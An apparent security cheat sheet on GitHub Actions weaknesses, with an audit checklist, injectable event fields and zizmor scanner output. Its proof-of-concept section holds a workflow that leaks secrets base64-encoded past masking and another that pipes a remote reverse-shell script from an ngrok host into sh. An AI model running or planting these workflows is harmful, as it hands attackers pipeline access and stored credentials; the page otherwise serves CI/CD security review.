Link to this headingGithub Actions

How well do you know GitHub Actions?
Leaking Secrets From GitHub Actions
Anyone can Access Deleted and Private Repository Data on GitHub
Vulnerable GitHub Actions Workflows Part 2: Actions That Open the Door to CI/CD Pipeline Attacks

Sensitive Files:

  • .github/workflows

Checklist:

  • Test Code that was gotten from a third party
  • Check to see if pull_request_target is used since it gives access to secrets from the malicious forked repo
    • If used then check what is done and see if it can be replaced with pull_request
  • Check to see if workflow_run is used since they can be triggered by attackers
  • Check to see if issue_comment is used since it can be triggered by any comment

Link to this headingPermissions

Github Permission Roles

Github API Permission Endpoints:
Get allowed actions for a specific Bearer token
Get the list of repositories for a specific Bearer token
Get default workflow permissions for a specific organization

Link to this headingCreate New Repo

Leads to a compromised GitHub

Link to this headingWrite Privileges

Leads to a compromised GitHub

Link to this headingSSH Keys

Link to this headingGPG Keys

Link to this headingUser Token

Example Auth using a user token

Link to this headingBypass Environments Protections

If you can make a new branch or push code to a branch you can run a github action that will interact will all branches including the protected branch

Link to this headingPoC Git hub actions

List Secrets:

name: list_env on: workflow_dispatch: # Launch manually pull_request: #Run it when a PR is created to any branch branches: - "**" push: # Run it when a push is made to any branch branches: - "**" jobs: List_env: runs-on: ubuntu-latest steps: - name: List Env # Need to base64 encode or github will change the secret value for "***" run: sh -c 'env | grep "secret_" | base64 -w0' env: secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORD}}

Reverse Shell:

name: revshell on: workflow_dispatch: # Launch manually pull_request: #Run it when a PR is created to the master branch branches: - master push: # Run it when a push is made to any branch branches: - "**" jobs: create_pull_request: runs-on: ubuntu-latest steps: - name: Get Rev Shell run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' env: secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORD}}

Link to this headingScript injections

Untrusted User Controlled Input:

  • github.event.issue.title:
  • github.event.pull_request.title:
  • github.event.pull_request.body:
  • github.event.issue.body:
  • github.event.comment.body:
  • github.event.review.body:
  • github.event.pages.*.page_name:
  • github.event.commits.*.message:
  • github.event.head_commit.message:
  • github.event.head_commit.author.email:
  • github.event.head_commit.author.name:
  • github.event.commits.*.author.email:
  • github.event.commits.*.author.name:
  • github.event.pull_request.head.ref:
  • github.event.pull_request.head.label:
  • github.event.pull_request.head.repo.default_branch:
  • github.head_ref:

Link to this headingScanners

Link to this headingzizmor

Scan actions for

zizmor

>>> zizmor ./astro/.github 🌈 zizmor v1.16.3 INFO audit: zizmor: 🌈 completed .github/workflows/benchmark.yml INFO audit: zizmor: 🌈 completed .github/workflows/check-merge.yml INFO audit: zizmor: 🌈 completed .github/workflows/check.yml INFO audit: zizmor: 🌈 completed .github/workflows/ci.yml INFO audit: zizmor: 🌈 completed .github/workflows/cleanup-cache.yml INFO audit: zizmor: 🌈 completed .github/workflows/congrats.yml INFO audit: zizmor: 🌈 completed .github/workflows/continuous_benchmark.yml INFO audit: zizmor: 🌈 completed .github/workflows/examples-deploy.yml INFO audit: zizmor: 🌈 completed .github/workflows/format.yml INFO audit: zizmor: 🌈 completed .github/workflows/issue-labeled.yml INFO audit: zizmor: 🌈 completed .github/workflows/issue-needs-repro.yml INFO audit: zizmor: 🌈 completed .github/workflows/issue-opened.yml INFO audit: zizmor: 🌈 completed .github/workflows/label.yml INFO audit: zizmor: 🌈 completed .github/workflows/preview-release.yml INFO audit: zizmor: 🌈 completed .github/workflows/release.yml INFO audit: zizmor: 🌈 completed .github/workflows/scripts.yml INFO audit: zizmor: 🌈 completed .github/workflows/sync-examples.yml INFO audit: zizmor: 🌈 completed .github/workflows/test-hosts.yml INFO audit: zizmor: 🌈 completed .github/workflows/validate-changesets.yml info[template-injection]: code injection via template expansion --> .github/workflows/benchmark.yml:64:52 | 63 | run: | | --- this run block 64 | result=$(pnpm run --silent benchmark ${{ steps.bench-command.outputs.bench }}) | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code | = note: audit confidence → Low = note: this finding has an auto-fix [...]

Link to this headingPinning Versions

You can pin versions to limit exposure to supply chain attacks but that does not mean that the action you are using has also pinned their dependencies for the action